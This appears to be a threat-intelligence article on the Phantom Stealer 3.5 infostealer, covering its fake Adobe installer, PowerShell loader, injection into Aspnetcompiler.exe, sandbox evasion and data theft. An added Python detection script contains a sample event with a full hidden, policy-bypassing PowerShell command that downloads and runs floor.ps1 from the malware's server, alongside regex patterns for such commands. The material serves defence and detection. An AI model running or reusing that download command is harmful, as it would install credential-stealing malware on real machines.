
Phantom Stealer version 3.5 has emerged as a serious threat to users worldwide, capable of extracting sensitive information including passwords, browser cookies, credit card details, and cryptocurrency wallet data.
This sophisticated malware operates through deceptive packaging, often disguised as legitimate Adobe software installers, making it difficult for unaware users to identify the danger before infection occurs.
The attack begins with a fake Adobe 11.7.7 installer file, first identified on October 29, 2025. The file is actually an obfuscated XML document containing embedded JavaScript code designed to trigger a chain of malicious activities.
When executed, the file downloads a PowerShell script from a remote server, setting the stage for deeper system compromise and data collection.
K7 Security Labs researchers identified that Phantom Stealer employs a multi-stage infection mechanism that demonstrates significant technical sophistication.
The malware downloads an obfuscated PowerShell script from the URL positivepay-messages.com/file/floor.ps1, which runs with hidden attributes and bypasses security policies.
This script contains RC4-encrypted data that, once decrypted, reveals instructions for loading a .NET assembly directly into memory.
The second phase involves the BLACKHAWK.dll injector, a critical component that performs process injection into the legitimate Windows utility Aspnetcompiler.exe.
This injection technique loads malicious code into a trusted system process, allowing the stealer to operate under the radar of security software.
The malware checks every five seconds whether Aspnetcompiler.exe is still running, ensuring persistent operation.
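As an added defender-side illustration (not code from K7 Security Labs or the article), the following Python checks constructed Sysmon-style process-creation events for the two behaviours described above: a PowerShell launch with a hidden window, execution-policy bypass and a remote download, and aspnet_compiler.exe started by an unexpected parent or without arguments. The sample events and the parent-process baseline are assumptions for this example.

```python
import ntpath
import re

# Constructed Sysmon-style process-creation events; not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass "
                    "-Command \"IEX((New-Object Net.WebClient).DownloadString("
                    "'http://positivepay-messages.com/file/floor.ps1'))\"",
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
     "CommandLine": "aspnet_compiler.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
     "CommandLine": "aspnet_compiler.exe -v /MyWebApp -p C:\\src\\MyWebApp",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\MSBuild\MSBuild.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Service",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# Command-line markers for the hidden, policy-bypassing download cradle.
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
BYPASS = re.compile(r"-e(?:xecutionpolicy|x|p)\s+bypass", re.I)
DOWNLOAD = re.compile(r"downloadstring|downloadfile|invoke-webrequest|https?://", re.I)

# Assumed baseline: parents that legitimately launch aspnet_compiler.exe.
EXPECTED_ASPNET_PARENTS = {"msbuild.exe", "devenv.exe", "aspnet_compiler.exe"}


def basename(path):
    return ntpath.basename(path).lower()


def is_aspnet_compiler(image):
    # The article writes "Aspnetcompiler.exe"; the binary ships as
    # aspnet_compiler.exe, so compare with the underscore removed.
    return basename(image).replace("_", "") == "aspnetcompiler.exe"


def classify(event):
    """Return the list of rule names the event triggers (empty if benign)."""
    img, cmd, parent = event["Image"], event["CommandLine"], event["ParentImage"]
    hits = []
    if basename(img) in ("powershell.exe", "pwsh.exe") and HIDDEN.search(cmd) \
            and BYPASS.search(cmd) and DOWNLOAD.search(cmd):
        hits.append("hidden-bypass-download-cradle")
    if is_aspnet_compiler(img):
        if basename(parent) not in EXPECTED_ASPNET_PARENTS:
            hits.append("aspnet_compiler-unexpected-parent")
        if len(cmd.split()) == 1:  # injection targets are often spawned bare
            hits.append("aspnet_compiler-no-arguments")
    return hits


def scan(events):
    return [(basename(e["Image"]), classify(e)) for e in events if classify(e)]
```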
Process Injection and Evasion Techniques
Phantom Stealer leverages advanced evasion methods to avoid detection and analysis. The malware implements numerous anti-analysis checks, including detection of virtual machines, sandboxes, and monitoring tools by matching the current username against a hardcoded list of 112 sandbox usernames.
If such environments are detected, the malware self-destructs by creating a batch file that forcefully terminates its process.
Most notably, the stealer uses Heaven's Gate, a sophisticated user-mode-hook evasion technique in which a 32-bit process transitions to 64-bit execution mode.
This allows the malware to bypass 32-bit user-mode hooks and perform native x64 syscalls directly, accessing sensitive data without triggering security mechanisms designed to monitor process behavior.
Once installed, Phantom Stealer extracts browser credentials, including Chrome and Edge data, by accessing encrypted databases and decrypting them using extracted encryption keys.
The malware harvests cryptocurrency wallet credentials, Outlook email configurations, keylogged data, and system information including screenshots captured every 1000 milliseconds.
For data exfiltration, the stealer employs multiple channels, including SMTP and FTP as well as communication platforms such as Telegram and Discord.
Stolen data is organized by computer name and timestamp, creating a structured repository of victim information ready for malicious use.
Organizations should implement robust email filtering, regular software updates, and advanced endpoint protection to defend against this evolving threat.
